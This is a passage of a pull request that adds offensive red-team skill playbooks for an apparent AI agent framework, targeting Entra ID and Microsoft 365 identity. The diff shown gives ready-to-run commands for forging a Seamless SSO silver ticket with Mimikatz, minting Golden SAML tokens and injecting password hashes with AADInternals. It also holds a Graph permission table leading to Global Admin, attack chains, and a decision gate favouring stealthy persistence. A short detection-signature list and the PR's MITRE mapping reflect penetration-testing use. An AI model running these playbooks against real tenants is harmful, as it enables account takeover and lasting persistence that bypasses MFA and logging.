+Set-AADIntUserPassword -SourceAnchor <BASE64_IMMUTABLEID> -Hash <NTLM_HASH> -Verbose
+```
+
+### Seamless SSO Silver Ticket → arbitrary cloud user
+Seamless SSO uses the on-prem `AZUREADSSOACC$` computer account's NTLM hash to sign Kerberos tickets. With that hash (DCSync), forge a TGS for any user → cloud auth without password:
+
+```powershell
+Invoke-Mimikatz -Command '"kerberos::golden /user:<TARGET_UPN_PREFIX> /sid:<DOMAIN_SID> /target:aadg.windows.net.nsatc.net /service:HTTP /rc4:<AZUREADSSOACC_HASH> /ptt"'
+# Then browse to https://login.microsoftonline.com → seamless auth as <TARGET_UPN_PREFIX>@<TARGET>.
+```
+
+### Golden SAML
+For federated tenants (ADFS), with the ADFS token-signing certificate:
+
+```powershell
+Export-AADIntADFSSigningCertificate     # AADInternals — pulls cert from ADFS host
+New-AADIntSAMLToken -ImmutableID <BASE64> -Issuer http://<ADFS>/adfs/services/trust/ -PfxFileName cert.pfx -PfxPassword '' -UseBuiltInCertificate
+# Mint SAML for ANY user in the federated domain, indefinitely. No password, no MFA, no logs at ADFS (forged offline).
+```
+
+## Phase 6: Graph API privesc primitives
+
+| Permission | Path to GA |
+|---|---|
+| `RoleManagement.ReadWrite.Directory` | Direct: assign self Global Admin role |
+| `Application.ReadWrite.All` | Mint cred on a high-priv SP → that SP's roles |
+| `AppRoleAssignment.ReadWrite.All` | Grant your own SP `RoleManagement.ReadWrite.Directory` |
+| `Directory.ReadWrite.All` | Reset non-admin passwords + group membership changes |
+| `User.ReadWrite.All` + group-owner of role-assignable group | Add self to role-assignable group |
+| `Policy.ReadWrite.ConditionalAccess` | Disable CA on the BG account, then go quiet |
+| `Domain.ReadWrite.All` | Add an attacker-owned federated domain → impersonate any user via Golden-SAML-style trust |
+
+## Chains
+- **Phished low-priv user owns one app with `Application.ReadWrite.All` → mint SP cred → grant self `RoleManagement.RW` → assign self Global Admin**.
+- **Dynamic-group rule on `otherMails` → self-PATCH → land in role-assignable group → GA in minutes**.
+- **AU UserAdmin → reset AU-member who is Application Admin → SP cred persistence**.
+- **AAD Connect compromise → MSOL DCSync → on-prem domain + AzureADSSOACC$ hash → cloud user impersonation**.
+- **ADFS token-signing cert → Golden SAML → permanent cloud identity bypass** (survives password resets, MFA, CA — only domain re-federation kills it).
+
+## Tools
+- **AADInternals** — sync creds, PTA Spy, Golden SAML, hash injection.
+- **ROADtools roadtx** — Graph-side enum + token operations.
+- **AzureHound** — BloodHound for Entra; finds privesc edges automatically.
+- **MicroBurst** — Azure-focused PowerShell offensive toolkit.
+- **GraphRunner** — interactive Graph operator.
+- **adconnectdump** — extract MSOL credentials non-interactively.
+
+## Detection signatures
+- Audit log `Add service principal credentials` / `Update application – Certificates and secrets management` from non-Identity admin = persistence flag.
+- Role assignment outside PIM (`Add member to role` without `Add eligible member`) = privesc indicator.
+- New federated domain (`Set domain authentication`) is a critical-tier alert in Sentinel — used for Golden SAML setup.
+- Dynamic group rule re-evaluation log + corresponding `Update user` event on attacker-controlled attribute = correlation signature.
+- AAD Connect host: any non-msol process touching `LSASS` or `MIIServer.exe` = MSOL extraction.
+
+## Decision gate
+- Have `Application.ReadWrite.All` or own an app with it → take the SP cred → GA path is 2 API calls.
+- AAD Connect host accessible → MSOL + AzureADSSOACC$ unlocks both on-prem and cloud halves; prefer this for long-term.
+- Federated tenant + ADFS host accessible → Golden SAML is the cleanest persistence (offline, no API calls until use).
+- No clear path → drop a credential on a low-noise SP for persistence and revisit after more recon (`entra-enum`).


### PR DESCRIPTION
Adds four MITRE-mapped offensive playbooks under `packages/decepticon/decepticon/skills/standard/cloud/` covering the **Entra ID / M365 identity plane** — distinct from the existing `azure-managed-identity` skill (which covers VM/IMDS MSI).

## Leaves

| Skill | Coverage | MITRE |
|---|---|---|
| `entra-enum/SKILL.md` | Unauth tenant discovery (OpenID config, GetUserRealm, autodiscover), user enumeration (login response codes, OneDrive), federation/MFA/CA posture, authenticated recon via ROADtools `roadrecon` + AADInternals + MSGraph | T1087.004, T1589.002, T1526, T1078.004 |
| `entra-device-code-phishing/SKILL.md` | OAuth device-code flow phishing, FOCI client swap, illicit consent grant via malicious multi-tenant app, refresh-token replay, Primary Refresh Token (PRT) abuse concepts | T1528, T1566.002, T1078.004, T1550.001 |
| `entra-conditional-access-bypass/SKILL.md` | CA gap discovery, ROPC + legacy auth (SMTP-AUTH / IMAP / POP / EWS), device/platform/UA/location/trusted-IP spoofing, service-principal app-auth bypass, break-glass account abuse | T1556, T1078.004, T1550.001, T1199 |
| `entra-privesc/SKILL.md` | App role / app-owner abuse, SP credential addition, dynamic group rule abuse, Administrative Unit role assignment, hybrid identity (AAD Connect/MSOL, PHS injection, PTA Spy, Seamless SSO silver ticket, Golden SAML), Graph API privesc primitives | T1098, T1098.001, T1098.003, T1556.007, T1606.002, T1078.004 |

## Format

Each file follows the exact shape of existing cloud skills (`azure-managed-identity`, `gcp-svc-account-impersonation`):

- Frontmatter: `name` == dir, one-line `description`, `allowed-tools: Bash Read Write`, `metadata` (`when_to_use` keywords, `subdomain: cloud`, `tags`, `mitre_attack`)
- Body: intro → phased detection/recon (copy-paste curl/Graph/AADInternals snippets using `<TENANT>` / `<TARGET>` / `<UPN>` placeholders, never real tenants) → technique sections → chains → tools → detection signatures → decision gate
- ~147–201 lines each, trailing newline, no trailing whitespace

## Validation

- `yaml.safe_load` clean on all four frontmatters; `name` == dirname verified
- `uv run ruff check .` — All checks passed!
- `uv run pytest -p no:xdist -q packages/decepticon/tests/unit/tools/test_skills_loader.py packages/decepticon/tests/unit/tools/test_skills_registry.py packages/decepticon/tests/unit/tools/test_skills.py packages/decepticon/tests/unit/middleware/test_skills.py packages/decepticon/tests/unit/backends/test_skills_path.py` → **111 passed**
- ADD-only: skill files only, no code/deps/pyproject changes